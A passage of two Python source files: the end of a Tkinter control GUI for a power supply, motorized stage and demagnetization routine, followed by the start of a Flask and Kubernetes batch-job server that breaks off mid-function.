self.Label_ps.place(relx=0.025, rely=0.031, height=23, width=190)
self.Label_ps.configure(activebackground="#f9f9f9")
self.Label_ps.configure(font=font9)
self.Label_ps.configure(text='''Power Supply''')
self.Button_ps_interrupt = Button(
self.Current_Frame, command=lambda: supply_interupt())
self.Button_ps_interrupt.place(
relx=0.642, rely=0.842, height=36, width=131)
self.Button_ps_interrupt.configure(activebackground="#d80000")
self.Button_ps_interrupt.configure(background="#d80000")
self.Button_ps_interrupt.configure(font=font10)
self.Button_ps_interrupt.configure(state=ACTIVE) # noqa
self.Button_ps_interrupt.configure(text='''Interrupt''')
self.Button_ps_interrupt.configure(width=131)
self.style.configure('TNotebook.Tab', background=_bgcolor)
self.style.configure('TNotebook.Tab', foreground=_fgcolor)
self.style.map(
'TNotebook.Tab',
background=[('selected', _compcolor), ('active', _ana2color)])
self.Notebook_ps = ttk.Notebook(self.Current_Frame)
self.Notebook_ps.place(
relx=0.025, rely=0.14, relheight=0.625, relwidth=0.919)
self.Notebook_ps.configure(width=372)
self.Notebook_ps.configure(takefocus="")
self.Notebook_ps_t0 = Frame(self.Notebook_ps)
self.Notebook_ps.add(self.Notebook_ps_t0, padding=3)
self.Notebook_ps.tab(
0,
text="Constant",
compound="left",
underline="-1",
)
self.Notebook_ps_t1 = Frame(self.Notebook_ps)
self.Notebook_ps.add(self.Notebook_ps_t1, padding=3)
self.Notebook_ps.tab(
1,
text="Square",
compound="left",
underline="-1",
)
self.Notebook_ps_t2 = Frame(self.Notebook_ps)
self.Notebook_ps.add(self.Notebook_ps_t2, padding=3)
self.Notebook_ps.tab(
2,
text="Sinusoidal",
compound="left",
underline="-1",
)
self.Notebook_ps_t3 = Frame(self.Notebook_ps)
self.Notebook_ps.add(self.Notebook_ps_t3, padding=3)
self.Notebook_ps.tab(
3,
text="Ramping",
compound="none",
underline="-1",
)
self.Label_constant_amps = Label(self.Notebook_ps_t0, anchor='w')
self.Label_constant_amps.place(
relx=0.027, rely=0.071, height=18, width=92)
self.Label_constant_amps.configure(activebackground="#f9f9f9")
self.Label_constant_amps.configure(text='''Amperes (A)''')
self.Entry_constant_amps = Entry(self.Notebook_ps_t0)
self.Entry_constant_amps.place(
relx=0.297, rely=0.071, height=20, relwidth=0.178)
self.Entry_constant_amps.configure(background="white")
self.Entry_constant_amps.configure(font="TkFixedFont")
self.Entry_constant_amps.configure(selectbackground="#c4c4c4")
self.Entry_constant_amps.configure(
textvariable=gui_support.constant_amps)
self.Label_constant_duration = Label(self.Notebook_ps_t0, anchor='w')
self.Label_constant_duration.place(
relx=0.027, rely=0.214, height=18, width=79)
self.Label_constant_duration.configure(activebackground="#f9f9f9")
self.Label_constant_duration.configure(text='''Run Time (s)''')
self.Entry_constant_duration = Entry(self.Notebook_ps_t0)
self.Entry_constant_duration.place(
relx=0.297, rely=0.214, height=20, relwidth=0.178)
self.Entry_constant_duration.configure(background="white")
self.Entry_constant_duration.configure(font="TkFixedFont")
self.Entry_constant_duration.configure(selectbackground="#c4c4c4")
self.Entry_constant_duration.configure(
textvariable=gui_support.constant_duration)
self.Button_constant_run = Button(
self.Notebook_ps_t0, command=lambda: constant_run())
self.Button_constant_run.place(
relx=0.027, rely=0.429, height=26, width=50)
self.Button_constant_run.configure(activebackground="#d9d9d9")
self.Button_constant_run.configure(text='''Run''')
self.Label_square_amp = Label(self.Notebook_ps_t1, anchor='w')
self.Label_square_amp.place(
relx=0.027, rely=0.071, height=18, width=99)
self.Label_square_amp.configure(activebackground="#f9f9f9")
self.Label_square_amp.configure(text='''Amplitude (A)''')
self.Entry_square_amp = Entry(self.Notebook_ps_t1)
self.Entry_square_amp.place(
relx=0.324, rely=0.071, height=20, relwidth=0.178)
self.Entry_square_amp.configure(background="white")
self.Entry_square_amp.configure(font="TkFixedFont")
self.Entry_square_amp.configure(selectbackground="#c4c4c4")
self.Entry_square_amp.configure(textvariable=gui_support.square_amp)
self.Label_square_duration = Label(self.Notebook_ps_t1, anchor='w')
self.Label_square_duration.place(
relx=0.027, rely=0.214, height=18, width=79)
self.Label_square_duration.configure(activebackground="#f9f9f9")
self.Label_square_duration.configure(text='''Run Time (s)''')
self.Entry_square_duration = Entry(self.Notebook_ps_t1)
self.Entry_square_duration.place(
relx=0.324, rely=0.214, height=20, relwidth=0.178)
self.Entry_square_duration.configure(background="white")
self.Entry_square_duration.configure(font="TkFixedFont")
self.Entry_square_duration.configure(selectbackground="#c4c4c4")
self.Entry_square_duration.configure(
textvariable=gui_support.square_duration)
self.Label_square_duty = Label(self.Notebook_ps_t1, anchor='w')
self.Label_square_duty.place(
relx=0.027, rely=0.357, height=18, width=93)
self.Label_square_duty.configure(activebackground="#f9f9f9")
self.Label_square_duty.configure(text='''Duty Cycle (%)''')
self.Entry_square_duty = Entry(self.Notebook_ps_t1)
self.Entry_square_duty.place(
relx=0.324, rely=0.357, height=20, relwidth=0.178)
self.Entry_square_duty.configure(background="white")
self.Entry_square_duty.configure(font="TkFixedFont")
self.Entry_square_duty.configure(selectbackground="#c4c4c4")
self.Entry_square_duty.configure(textvariable=gui_support.square_duty)
self.Label_square_freq = Label(self.Notebook_ps_t1, anchor='w')
self.Label_square_freq.place(relx=0.027, rely=0.5, height=18, width=97)
self.Label_square_freq.configure(activebackground="#f9f9f9")
self.Label_square_freq.configure(text='''Frequency (Hz)''')
self.Entry_square_freq = Entry(self.Notebook_ps_t1)
self.Entry_square_freq.place(
relx=0.324, rely=0.5, height=20, relwidth=0.178)
self.Entry_square_freq.configure(background="white")
self.Entry_square_freq.configure(font="TkFixedFont")
self.Entry_square_freq.configure(selectbackground="#c4c4c4")
self.Entry_square_freq.configure(textvariable=gui_support.square_freq)
self.Button_square_run = Button(
self.Notebook_ps_t1, command=lambda: square_run())
self.Button_square_run.place(
relx=0.027, rely=0.714, height=26, width=50)
self.Button_square_run.configure(activebackground="#d9d9d9")
self.Button_square_run.configure(text='''Run''')
self.Button_square_plot = Button(
self.Notebook_ps_t1, command=lambda: plot_square())
self.Button_square_plot.place(
relx=0.227, rely=0.714, height=26, width=125)
self.Button_square_plot.configure(activebackground="#d9d9d9")
self.Button_square_plot.configure(text='''Show Waveform''')
self.Entry_sin_freq = Entry(self.Notebook_ps_t2)
self.Entry_sin_freq.place(
relx=0.324, rely=0.357, height=20, relwidth=0.178)
self.Entry_sin_freq.configure(background="white")
self.Entry_sin_freq.configure(font="TkFixedFont")
self.Entry_sin_freq.configure(selectbackground="#c4c4c4")
self.Entry_sin_freq.configure(textvariable=gui_support.sin_freq)
self.Label_sin_freq = Label(self.Notebook_ps_t2, anchor='w')
self.Label_sin_freq.place(relx=0.027, rely=0.357, height=18, width=97)
self.Label_sin_freq.configure(activebackground="#f9f9f9")
self.Label_sin_freq.configure(text='''Frequency (Hz)''')
self.Label_sin_amp = Label(self.Notebook_ps_t2, anchor='w')
self.Label_sin_amp.place(relx=0.027, rely=0.071, height=18, width=99)
self.Label_sin_amp.configure(activebackground="#f9f9f9")
self.Label_sin_amp.configure(text='''Amplitude (A)''')
self.Entry_sin_amplitude = Entry(self.Notebook_ps_t2)
self.Entry_sin_amplitude.place(
relx=0.324, rely=0.071, height=20, relwidth=0.178)
self.Entry_sin_amplitude.configure(background="white")
self.Entry_sin_amplitude.configure(font="TkFixedFont")
self.Entry_sin_amplitude.configure(selectbackground="#c4c4c4")
self.Entry_sin_amplitude.configure(
textvariable=gui_support.sin_amplitude)
self.Label_sin_offset = Label(self.Notebook_ps_t2, anchor='w')
self.Label_sin_offset.place(
relx=0.027, rely=0.214, height=18, width=74)
self.Label_sin_offset.configure(activebackground="#f9f9f9")
self.Label_sin_offset.configure(text='''Offset (A)''')
self.Entry_sin_offset = Entry(self.Notebook_ps_t2)
self.Entry_sin_offset.place(
relx=0.324, rely=0.214, height=20, relwidth=0.178)
self.Entry_sin_offset.configure(background="white")
self.Entry_sin_offset.configure(font="TkFixedFont")
self.Entry_sin_offset.configure(selectbackground="#c4c4c4")
self.Entry_sin_offset.configure(textvariable=gui_support.sin_offset)
self.Label_sin_duration = Label(self.Notebook_ps_t2, anchor='w')
self.Label_sin_duration.place(
relx=0.027, rely=0.5, height=18, width=79)
self.Label_sin_duration.configure(activebackground="#f9f9f9")
self.Label_sin_duration.configure(text='''Run Time (s)''')
self.Entry_sin_duration = Entry(self.Notebook_ps_t2)
self.Entry_sin_duration.place(
relx=0.324, rely=0.5, height=20, relwidth=0.178)
self.Entry_sin_duration.configure(background="white")
self.Entry_sin_duration.configure(font="TkFixedFont")
self.Entry_sin_duration.configure(selectbackground="#c4c4c4")
self.Entry_sin_duration.configure(
textvariable=gui_support.sin_duration)
self.Button_sin_run = Button(
self.Notebook_ps_t2, command=lambda: sinusoidal_run())
self.Button_sin_run.place(relx=0.027, rely=0.714, height=26, width=50)
self.Button_sin_run.configure(activebackground="#d9d9d9")
self.Button_sin_run.configure(text='''Run''')
self.Button_sin_plot = Button(
self.Notebook_ps_t2, command=lambda: plot_sin())
self.Button_sin_plot.place(
relx=0.227, rely=0.714, height=26, width=125)
self.Button_sin_plot.configure(activebackground="#d9d9d9")
self.Button_sin_plot.configure(text='''Show Waveform''')
self.Label_ramping_amp = Label(self.Notebook_ps_t3, anchor='w')
self.Label_ramping_amp.place(
relx=0.027, rely=0.071, height=18, width=99)
self.Label_ramping_amp.configure(text='''Amplitude (A)''')
self.Label_ramping_rise = Label(self.Notebook_ps_t3, anchor='w')
self.Label_ramping_rise.place(
relx=0.027, rely=0.214, height=18, width=84)
self.Label_ramping_rise.configure(text='''Rise Time (s)''')
self.Label_ramping_steady = Label(self.Notebook_ps_t3, anchor='w')
self.Label_ramping_steady.place(
relx=0.027, rely=0.357, height=18, width=101)
self.Label_ramping_steady.configure(text='''Steady Time (s)''')
self.Label_ramping_rest = Label(self.Notebook_ps_t3, anchor='w')
self.Label_ramping_rest.place(
relx=0.027, rely=0.5, height=18, width=86)
self.Label_ramping_rest.configure(text='''Rest Time (s)''')
self.Label_ramping_duration = Label(self.Notebook_ps_t3, anchor='w')
self.Label_ramping_duration.place(
relx=0.027, rely=0.643, height=18, width=86)
self.Label_ramping_duration.configure(text='''Run Time (s)''')
self.Entry_ramping_amp = Entry(self.Notebook_ps_t3)
self.Entry_ramping_amp.place(
relx=0.324, rely=0.071, height=20, relwidth=0.178)
self.Entry_ramping_amp.configure(background="white")
self.Entry_ramping_amp.configure(font="TkFixedFont")
self.Entry_ramping_amp.configure(textvariable=gui_support.ramping_amp)
self.Entry_ramping_amp.configure(width=66)
self.Entry_ramping_rise = Entry(self.Notebook_ps_t3)
self.Entry_ramping_rise.place(
relx=0.324, rely=0.214, height=20, relwidth=0.178)
self.Entry_ramping_rise.configure(background="white")
self.Entry_ramping_rise.configure(font="TkFixedFont")
self.Entry_ramping_rise.configure(
textvariable=gui_support.ramping_rise)
self.Entry_ramping_rise.configure(width=66)
self.Entry_ramping_steady = Entry(self.Notebook_ps_t3)
self.Entry_ramping_steady.place(
relx=0.324, rely=0.357, height=20, relwidth=0.178)
self.Entry_ramping_steady.configure(background="white")
self.Entry_ramping_steady.configure(font="TkFixedFont")
self.Entry_ramping_steady.configure(
textvariable=gui_support.ramping_steady)
self.Entry_ramping_steady.configure(width=66)
self.Entry_ramping_rest = Entry(self.Notebook_ps_t3)
self.Entry_ramping_rest.place(
relx=0.324, rely=0.5, height=20, relwidth=0.178)
self.Entry_ramping_rest.configure(background="white")
self.Entry_ramping_rest.configure(font="TkFixedFont")
self.Entry_ramping_rest.configure(
textvariable=gui_support.ramping_rest)
self.Entry_ramping_rest.configure(width=66)
self.Entry_ramping_duration = Entry(self.Notebook_ps_t3)
self.Entry_ramping_duration.place(
relx=0.324, rely=0.643, height=20, relwidth=0.178)
self.Entry_ramping_duration.configure(background="white")
self.Entry_ramping_duration.configure(font="TkFixedFont")
self.Entry_ramping_duration.configure(
textvariable=gui_support.ramping_duration)
self.Entry_ramping_duration.configure(width=66)
self.Button_ramping_run = Button(
self.Notebook_ps_t3, command=lambda: ramping_run())
self.Button_ramping_run.place(
relx=0.027, rely=0.857, height=26, width=50)
self.Button_ramping_run.configure(activebackground="#d9d9d9")
self.Button_ramping_run.configure(text='''Run''')
self.Button_ramping_plot = Button(
self.Notebook_ps_t3, command=lambda: plot_ramping())
self.Button_ramping_plot.place(
relx=0.227, rely=0.857, height=26, width=125)
self.Button_ramping_plot.configure(activebackground="#d9d9d9")
self.Button_ramping_plot.configure(text='''Show Waveform''')
self.Button_stop = Button(self.Current_Frame, command=lambda: stop())
self.Button_stop.place(relx=0.025, rely=0.850, height=26, width=170)
self.Button_stop.configure(activebackground="#d9d9d9")
self.Button_stop.configure(text='''Stop Power Supply Output''')
self.Status_Frame = Frame(top)
self.Status_Frame.place(
relx=0.541, rely=0.0, relheight=0.735, relwidth=0.455)
self.Status_Frame.configure(relief=RAISED) # noqa
self.Status_Frame.configure(borderwidth="2")
self.Status_Frame.configure(relief=RAISED) # noqa
self.Status_Frame.configure(width=345)
self.Label_status = Label(self.Status_Frame, anchor='w')
self.Label_status.place(relx=0.029, rely=0.019, height=23, width=60)
self.Label_status.configure(activebackground="#f9f9f9")
self.Label_status.configure(font=font9)
self.Label_status.configure(text='''Status''')
# self.Label_status_relpos = Label(self.Status_Frame, anchor='w')
# self.Label_status_relpos.place(relx=0.058,
# rely=0.076,
# height=18,
# width=144)
# self.Label_status_relpos.configure(activebackground="#f9f9f9")
# relpost_text = '''Relative Position (um)'''
# self.Label_status_relpos.configure(text=relpost_text)
self.Label_status_abspos = Label(self.Status_Frame, anchor='w')
self.Label_status_abspos.place(
relx=0.058, rely=0.114, height=18, width=100)
self.Label_status_abspos.configure(text='''Position (um):''')
self.Label_status_abspos_v = Label(self.Status_Frame, anchor='w')
self.Label_status_abspos_v.place(
relx=0.4, rely=0.114, height=18, width=175)
self.Label_status_abspos_v.configure(text='''Value''')
self.Label_status_abspos_v.configure(
textvariable=gui_support.status_abspos_v)
self.Label_status_res = Label(self.Status_Frame, anchor='w')
self.Label_status_res.place(relx=0.058, rely=0.19, height=18, width=74)
self.Label_status_res.configure(activebackground="#f9f9f9")
self.Label_status_res.configure(text='''Resolution:''')
self.Label_status_vel = Label(self.Status_Frame, anchor='w')
self.Label_status_vel.place(
relx=0.058, rely=0.152, height=18, width=100)
self.Label_status_vel.configure(activebackground="#f9f9f9")
self.Label_status_vel.configure(text='''Velocity (um/s):''')
self.Label_status_magfield = Label(self.Status_Frame, anchor='w')
self.Label_status_magfield.place(
relx=0.058, rely=0.229, height=18, width=98)
self.Label_status_magfield.configure(activebackground="#f9f9f9")
self.Label_status_magfield.configure(text='''Magnetic Field:''')
self.Label_console = Label(self.Status_Frame, anchor='w')
self.Label_console.place(relx=0.058, rely=0.59, height=18, width=101)
self.Label_console.configure(activebackground="#f9f9f9")
self.Label_console.configure(text='''Console Output''')
# self.Label_status_relpos_v = Label(self.Status_Frame, anchor='w')
# self.Label_status_relpos_v.place(relx=0.493,
# rely=0.076,
# height=18,
# width=160)
# self.Label_status_relpos_v.configure(activebackground="#f9f9f9")
# self.Label_status_relpos_v.configure(justify=LEFT)
# self.Label_status_relpos_v.configure(text='''Value''')
# self.Label_status_relpos_v.configure(textvariable=gui_support.status_relpos_v)
# self.Label_status_relpos_v.configure(width=89)
self.Label_status_vel_v = Label(self.Status_Frame, anchor='w')
self.Label_status_vel_v.place(
relx=0.377, rely=0.152, height=18, width=39)
self.Label_status_vel_v.configure(activebackground="#f9f9f9")
self.Label_status_vel_v.configure(justify=LEFT) # noqa
self.Label_status_vel_v.configure(text='''Value''')
self.Label_status_vel_v.configure(
textvariable=gui_support.status_vel_v)
self.Label_status_res_v = Label(self.Status_Frame, anchor='w')
self.Label_status_res_v.place(
relx=0.319, rely=0.19, height=18, width=90)
self.Label_status_res_v.configure(activebackground="#f9f9f9")
self.Label_status_res_v.configure(justify=LEFT) # noqa
self.Label_status_res_v.configure(text='''Value''')
self.Label_status_res_v.configure(
textvariable=gui_support.status_res_v)
self.Label_status_magfield_v = Label(self.Status_Frame, anchor='w')
self.Label_status_magfield_v.place(
relx=0.377, rely=0.229, height=18, width=39)
self.Label_status_magfield_v.configure(activebackground="#f9f9f9")
self.Label_status_magfield_v.configure(justify=LEFT) # noqa
self.Label_status_magfield_v.configure(text='''Value''')
self.Label_status_magfield_v.configure(
textvariable=gui_support.status_magfield_v)
self.Label_status_current = Label(self.Status_Frame)
self.Label_status_current.place(
relx=0.058, rely=0.307, height=18, width=77)
self.Label_status_current.configure(anchor='w')
self.Label_status_current.configure(text='''Current (A):''')
self.Label_status_current_v = Label(self.Status_Frame)
self.Label_status_current_v.place(
relx=0.319, rely=0.307, height=18, width=97)
self.Label_status_current_v.configure(anchor='w')
self.Label_status_current_v.configure(text='''Value''')
self.Label_status_current_v.configure(
textvariable=gui_support.status_current_v)
self.Label_status_current_v.configure(width=97)
self.Label_status_wave = Label(self.Status_Frame)
self.Label_status_wave.place(
relx=0.058, rely=0.268, height=18, width=69)
self.Label_status_wave.configure(anchor='w')
self.Label_status_wave.configure(text='''Waveform:''')
self.Label_status_wave_v = Label(self.Status_Frame)
self.Label_status_wave_v.place(
relx=0.329, rely=0.268, height=18, width=107)
self.Label_status_wave_v.configure(anchor='w')
self.Label_status_wave_v.configure(text='''Value''')
self.Label_status_wave_v.configure(
textvariable=gui_support.status_wave_v)
self.Label_status_wave_v.configure(width=107)
self.Label_status_duration = Label(self.Status_Frame)
self.Label_status_duration.place(
relx=0.058, rely=0.346, height=18, width=83)
self.Label_status_duration.configure(anchor='w')
self.Label_status_duration.configure(text='''Duration (s):''')
self.Label_status_duration_v = Label(self.Status_Frame)
self.Label_status_duration_v.place(
relx=0.319, rely=0.346, height=18, width=37)
self.Label_status_duration_v.configure(anchor='w')
self.Label_status_duration_v.configure(text='''Label''')
self.Label_status_duration_v.configure(
textvariable=gui_support.status_duration_v)
self.Button_status_refresh = Button(
self.Status_Frame, command=lambda: status_refresh())
self.Button_status_refresh.place(
relx=0.754, rely=0.019, height=26, width=74)
self.Button_status_refresh.configure(activebackground="#d9d9d9")
self.Button_status_refresh.configure(text='''Refresh''')
self.Button_master_stop = Button(
self.Status_Frame, command=lambda: master_stop())
self.Button_master_stop.place(
relx=0.319, rely=0.895, height=41, width=122)
self.Button_master_stop.configure(activebackground="#d80000")
self.Button_master_stop.configure(activeforeground="white")
self.Button_master_stop.configure(background="#d80000")
self.Button_master_stop.configure(font=font11)
self.Button_master_stop.configure(text='''STOP ALL''')
self.Button_master_stop.configure(width=122)
self.Button_clear_console = Button(
self.Status_Frame, command=lambda: clear_console())
self.Button_clear_console.place(
relx=0.7, rely=0.562, height=26, width=95)
self.Button_clear_console.configure(activebackground="#d9d9d9")
self.Button_clear_console.configure(text='''Clear Console''')
self.Button_print_console = Button(
self.Status_Frame, command=lambda: write_log())
self.Button_print_console.place(
relx=0.475, rely=0.562, height=26, width=70)
self.Button_print_console.configure(activebackground="#d9d9d9")
self.Button_print_console.configure(text='''Write Log''')
self.console_output = ScrolledText(self.Status_Frame)
self.console_output.place(
relx=0.029, rely=0.629, relheight=0.263, relwidth=0.951)
self.console_output.configure(background="white")
self.console_output.configure(font="TkTextFont")
self.console_output.configure(insertborderwidth="3")
self.console_output.configure(selectbackground="#c4c4c4")
self.console_output.configure(width=10)
self.console_output.configure(wrap=NONE) # noqa
self.Frame_demag = Frame(top)
self.Frame_demag.place(
relx=0.541, rely=0.743, relheight=0.251, relwidth=0.455)
self.Frame_demag.configure(relief=RAISED) # noqa
self.Frame_demag.configure(borderwidth="2")
self.Frame_demag.configure(relief=RAISED) # noqa
self.Frame_demag.configure(width=345)
self.Button_demag = Button(
self.Frame_demag, command=lambda: demagnetization())
self.Button_demag.place(relx=0.145, rely=0.550, height=40, width=215)
self.Button_demag.configure(activebackground="#d9d9d9")
self.Button_demag.configure(
text='''4. Start Demagnetization Process''')
self.Button_calibrate = Button(
self.Frame_demag, command=lambda: calibrate_demag())
self.Button_calibrate.place(
relx=0.300, rely=0.215, height=26, width=85)
self.Button_calibrate.configure(activebackground="#d9d9d9")
self.Button_calibrate.configure(text='''2. Calibrate''')
self.Label_demag_isntr1 = Label(self.Frame_demag, anchor='w')
self.Label_demag_isntr1.place(
relx=0.05, rely=0.050, height=18, width=275)
self.Label_demag_isntr1.configure(activebackground="#f9f9f9")
self.Label_demag_isntr1.configure(justify=LEFT) # noqa
self.Label_demag_isntr1.configure(
text='''1. Hold Hall sensor away from any magnetic field''')
self.Label_demag_isntr2 = Label(self.Frame_demag, anchor='w')
self.Label_demag_isntr2.place(
relx=0.05, rely=0.400, height=18, width=300)
self.Label_demag_isntr2.configure(activebackground="#f9f9f9")
self.Label_demag_isntr2.configure(justify=LEFT) # noqa
self.Label_demag_isntr2.configure(
text='''3. Hold Hall sensor directly on the tip of the solenoid''')
self.Label_demag_isntr3 = Label(self.Frame_demag, anchor='w')
self.Label_demag_isntr3.place(
relx=0.015, rely=0.820, height=18, width=335)
self.Label_demag_isntr3.configure(activebackground="#f9f9f9")
self.Label_demag_isntr3.configure(justify=LEFT) # noqa
self.Label_demag_isntr3.configure(
text='''*Note that there is a 3 second delay on each button''')
'''DEFAULT VALUES'''
if mm is None:
for child in self.MM_Frame.winfo_children():
child.configure(state='disable')
self.Entry_gtp_x.insert(0, "x")
self.Entry_gtp_y.insert(0, "y")
self.Entry_gtp_z.insert(0, "z")
self.Spinbox_step_x.insert(0, 0)
self.Spinbox_step_y.insert(0, 0)
self.Spinbox_step_z.insert(0, 0)
gui_support.radio_pos_mode.set("relative")
gui_support.radio_resolution.set("low")
gui_support.ramping_rest.set("0.25")
gui_support.ramping_rise.set("0.25")
gui_support.ramping_steady.set("0.25")
gui_support.ramping_amp.set("1")
gui_support.ramping_duration.set("10")
gui_support.sin_freq.set("10")
gui_support.sin_offset.set("1")
gui_support.sin_amplitude.set("0.5")
gui_support.sin_duration.set("10")
gui_support.square_duty.set("50")
gui_support.square_freq.set("10")
gui_support.square_duration.set("10")
gui_support.square_amp.set("1")
gui_support.constant_amps.set("1")
gui_support.constant_duration.set("10")
gui_support.velocity.set("1000")
gui_support.status_relpos_v.set("0x 0y 0z")
gui_support.status_abspos_v.set("0x 0y 0z")
gui_support.status_magfield_v.set("0")
gui_support.status_current_v.set("0")
gui_support.status_duration_v.set("0")
gui_support.status_res_v.set("Low")
gui_support.status_vel_v.set("500")
gui_support.status_wave_v.set("Constant")
self.Listbox_pos.insert(END, "0x, 0y, 0z") # noqa
status_refresh()
# The following code is added to facilitate the Scrolled widgets you specified.
class AutoScroll(object):
'''Configure the scrollbars for a widget.'''
def __init__(self, master):
# Rozen. Added the try-except clauses so that this class
# could be used for scrolled entry widget for which vertical
# scrolling is not supported. 5/7/14.
try:
vsb = ttk.Scrollbar(master, orient='vertical', command=self.yview)
except Exception:
pass
hsb = ttk.Scrollbar(master, orient='horizontal', command=self.xview)
# self.configure(yscrollcommand=_autoscroll(vsb),
# xscrollcommand=_autoscroll(hsb))
try:
self.configure(yscrollcommand=self._autoscroll(vsb))
except Exception:
pass
self.configure(xscrollcommand=self._autoscroll(hsb))
self.grid(column=0, row=0, sticky='nsew')
try:
vsb.grid(column=1, row=0, sticky='ns')
except Exception:
pass
hsb.grid(column=0, row=1, sticky='ew')
master.grid_columnconfigure(0, weight=1)
master.grid_rowconfigure(0, weight=1)
# Copy geometry methods of master (taken from ScrolledText.py)
if py3:
methods = (Pack.__dict__.keys() or
Grid.__dict__.keys() or
Place.__dict__.keys())
else:
methods = (Pack.__dict__.keys() +
Grid.__dict__.keys() +
Place.__dict__.keys())
for meth in methods:
if meth[0] != '_' and meth not in ('config', 'configure'):
setattr(self, meth, getattr(master, meth))
@staticmethod
def _autoscroll(sbar):
'''Hide and show scrollbar as needed.'''
def wrapped(first, last):
first, last = float(first), float(last)
if first <= 0 and last >= 1:
sbar.grid_remove()
else:
sbar.grid()
sbar.set(first, last)
return wrapped
def __str__(self):
return str(self.master)
def _create_container(func):
'''Creates a ttk Frame with a given master, and use this new frame to
place the scrollbars and the widget.'''
def wrapped(cls, master, **kw):
container = ttk.Frame(master)
return func(cls, container, **kw)
return wrapped
class ScrolledText(AutoScroll, Text):
'''A standard Tkinter Text widget with scrollbars that will
automatically show/hide as needed.'''
@_create_container
def __init__(self, master, **kw):
Text.__init__(self, master, **kw)
AutoScroll.__init__(self, master)
if __name__ == '__main__':
vp_start_gui()
|
server.py | import sys
import os
import time
import random
import uuid
from collections import Counter
import logging
import threading
from flask import Flask, request, jsonify, abort
import kubernetes as kube
import cerberus
import requests
from .globals import max_id, pod_name_job, job_id_job, _log_path, _read_file, batch_id_batch
from .globals import next_id
if not os.path.exists('logs'):
os.mkdir('logs')
else:
if not os.path.isdir('logs'):
raise OSError('logs exists but is not a directory')
def make_logger():
fmt = logging.Formatter(
# NB: no space after levename because WARNING is so long
'%(levelname)s\t| %(asctime)s \t| %(filename)s \t| %(funcName)s:%(lineno)d | '
'%(message)s')
file_handler = logging.FileHandler('batch.log')
file_handler.setLevel(logging.INFO)
file_handler.setFormatter(fmt)
stream_handler = logging.StreamHandler()
stream_handler.setLevel(logging.INFO)
stream_handler.setFormatter(fmt)
log = logging.getLogger('batch')
log.setLevel(logging.INFO)
logging.basicConfig(handlers=[file_handler, stream_handler], level=logging.INFO)
return log
log = make_logger()
KUBERNETES_TIMEOUT_IN_SECONDS = float(os.environ.get('KUBERNETES_TIMEOUT_IN_SECONDS', 5.0))
REFRESH_INTERVAL_IN_SECONDS = int(os.environ.get('REFRESH_INTERVAL_IN_SECONDS', 5 * 60))
POD_NAMESPACE = os.environ.get('POD_NAMESPACE', 'batch-pods')
log.info(f'KUBERNETES_TIMEOUT_IN_SECONDS {KUBERNETES_TIMEOUT_IN_SECONDS}')
log.info(f'REFRESH_INTERVAL_IN_SECONDS {REFRESH_INTERVAL_IN_SECONDS}')
if 'BATCH_USE_KUBE_CONFIG' in os.environ:
kube.config.load_kube_config()
else:
kube.config.load_incluster_config()
v1 = kube.client.CoreV1Api()
instance_id = uuid.uuid4().hex
log.info(f'instance_id = {instance_id}')
class Job:
def _create_pod(self):
assert not self._pod_name
pod = v1.create_namespaced_pod(
POD_NAMESPACE,
self.pod_template,
_request_timeout=KUBERNETES_TIMEOUT_IN_SECONDS)
self._pod_name = pod.metadata.name
pod_name_job[self._pod_name] = self
log.info('created pod name: {} for job {}'.format(self._pod_name, self.id))
def _delete_pod(self):
if self._pod_name:
try:
v1.delete_namespaced_pod(
self._pod_name,
POD_NAMESPACE,
kube.client.V1DeleteOptions(),
_request_timeout=KUBERNETES_TIMEOUT_IN_SECONDS)
except kube.client.rest.ApiException as err:
if err.status == 404:
pass
else:
raise
del pod_name_job[self._pod_name]
self._pod_name = None
def _read_log(self):
if self._state == 'Created':
if self._pod_name:
try:
return v1.read_namespaced_pod_log(
self._pod_name,
POD_NAMESPACE,
_request_timeout=KUBERNETES_TIMEOUT_IN_SECONDS)
except kube.client.rest.ApiException:
pass
return None
if self._state == 'Complete':
return _read_file(_log_path(self.id))
assert self._state == 'Cancelled'
return None
def __init__(self, pod_spec, batch_id, attributes, callback):
self.id = next_id()
job_id_job[self.id] = self
self.batch_id = batch_id
if batch_id:
batch = batch_id_batch[batch_id]
batch.jobs.append(self)
self.attributes = attributes
self.callback = callback
self.pod_template = kube.client.V1Pod(
metadata=kube.client.V1ObjectMeta(generate_name='job-{}-'.format(self.id),
labels={
'app': 'batch-job',
'hail.is/batch-instance': instance_id,
'uuid': uuid.uuid4().hex
}),
spec=pod_spec)
self._pod_name = None
self.exit_code = None
self._state = 'Created'
log.info('created job {}'.format(self.id))
self._create_pod()
def set_state(self, new_state):
if self._state != new_state:
log.info('job {} changed state: {} -> {}'.format(
self.id,
self._state,
new_state))
self._state = new_state
def cancel(self):
if self.is_complete():
return
self._delete_pod()
self.set_state('Cancelled')
def delete(self):
# remove from structures
del job_id_job[self.id]
if self.batch_id:
batch = batch_id_batch[self.batch_id]
batch.remove(self)
self._delete_pod()
def is_complete(self):
return self._state == 'Complete' or self._state == 'Cancelled'
def mark_unscheduled(self):
if self._pod_name:
del pod_name_job[self._pod_name]
self._pod_name = None
self._create_pod()
def mark_complete(self, pod):
self.exit_code = pod.status.container_statuses[0].state.terminated.exit_code
pod_log = v1.read_namespaced_pod_log(
pod.metadata.name,
POD_NAMESPACE,
_request_timeout=KUBERNETES_TIMEOUT_IN_SECONDS)
fname = _log_path(self.id)
with open(fname, 'w') as f:
f.write(pod_log)
log.info(f'wrote log for job {self.id} to {fname}')
if self._pod_name:
del pod_name_job[self._pod_name]
self._pod_name = None
self.set_state('Complete')
log.info('job {} complete, exit_code {}'.format(
self.id, self.exit_code))
if self.callback:
def handler(id, callback, json):
try:
requests.post(callback, json=json, timeout=120)
except requests.exceptions.RequestException as exc:
log.warning(
f'callback for job {id} failed due to an error, I will not retry. '
f'Error: {exc}')
threading.Thread(target=handler, args=(self.id, self.callback, self.to_json())).start()
def to_json(self):
result = {
'id': self.id,
'state': self._state
}
if self._state == 'Complete':
result['exit_code'] = self.exit_code
pod_log = self._read_log()
if pod_log:
result['log'] = pod_log
if self.attributes:
result['attributes'] = self.attributes
return result
app = Flask('batch')
@app.route('/jobs/create', methods=['POST'])
def create_job():
parameters = request.json
schema = {
# will be validated when creating pod
'spec': {
'type': 'dict',
'required': True,
'allow_unknown': True,
'schema': {}
},
'batch_id': {'type': 'integer'},
'attributes': {
'type': 'dict',
'keyschema': {'type': 'string'},
'valueschema': {'type': 'string'}
},
'callback': {'type': 'string'}
}
validator = cerberus.Validator(schema)
if not validator.validate(parameters):
abort(404, 'invalid request: {}'.format(validator.errors))
pod_spec = v1.api_client._ApiClient__deserialize(
